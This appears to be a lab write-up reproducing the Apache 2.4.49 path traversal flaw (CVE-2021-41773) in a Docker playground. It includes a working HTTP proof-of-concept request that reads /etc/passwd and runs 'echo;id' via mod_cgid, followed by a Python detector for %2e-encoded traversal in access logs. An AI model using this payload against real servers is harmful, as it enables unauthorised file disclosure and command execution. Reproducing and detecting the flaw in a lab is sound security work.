Vulnerable versions: only Apache HTTP Server 2.4.49 is affected
Recommended environment: GitHub - blasty/CVE-2021-41773: CVE-2021-41773 playground
After downloading it:
docker-compose build && docker-compose up
If you encounter the following:
then enter the container and edit:
vim /etc/apache2/apache2.conf
Append this line at the end:
ServerName localhost:80
After editing, restart:
apachectl restart
PoC:
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close

echo;id
Note: mod_cgid must be enabled for this to work; check with:
ls /etc/apache2/mods-available/ |grep cgi
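The PoC above works because 2.4.49 percent-decoded ".%2e" and "%2e%2e" segments only after its traversal check. An added example (not from the original page or the playground repo) that applies the same decode-then-check logic to constructed Apache access-log lines, flagging requests whose decoded path contains ".." and marking whether the ".." was hidden behind %2e encoding:

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (not from a real server). Line 1 uses the
# request path from the PoC above; line 2 is benign; line 3 is an unencoded traversal attempt.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Oct/2021:10:00:01 +0000] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1412 "-" "curl/7.79.1"
10.0.0.6 - - [06/Oct/2021:10:00:02 +0000] "GET /icons/apache_pb.gif HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
10.0.0.7 - - [06/Oct/2021:10:00:03 +0000] "GET /icons/../../etc/passwd HTTP/1.1" 400 226 "-" "curl/7.79.1"
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decoded_segments(target):
    """Split the request path (query string dropped) and percent-decode each segment once."""
    return [unquote(seg) for seg in target.split("?", 1)[0].split("/")]

def escapes_root(segments):
    """True when '..' segments climb above the directory the path started in."""
    depth = 0
    for seg in segments:
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False

def hides_dotdot(target):
    """True when a segment becomes '..' only after decoding (written with %2e, the 2.4.49 bypass)."""
    return any(seg != ".." and unquote(seg) == ".." for seg in target.split("?", 1)[0].split("/"))

def scan_log(text):
    """Return one finding per log line whose decoded path contains a '..' segment."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        segments = decoded_segments(m["target"])
        if ".." not in segments:
            continue
        findings.append({"ip": m["ip"], "target": m["target"], "status": int(m["status"]),
                         "encoded_dotdot": hides_dotdot(m["target"]),  # CVE-2021-41773 signature
                         "escapes_root": escapes_root(segments)})
    return findings
```

A finding with status 200 and encoded_dotdot set is the combination worth alerting on, since a patched server answers such requests with 400.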
Reference: CVE-2021-41773 advanced: in-depth analysis of escalating the Apache HTTP Server path traversal vulnerability to RCE with command output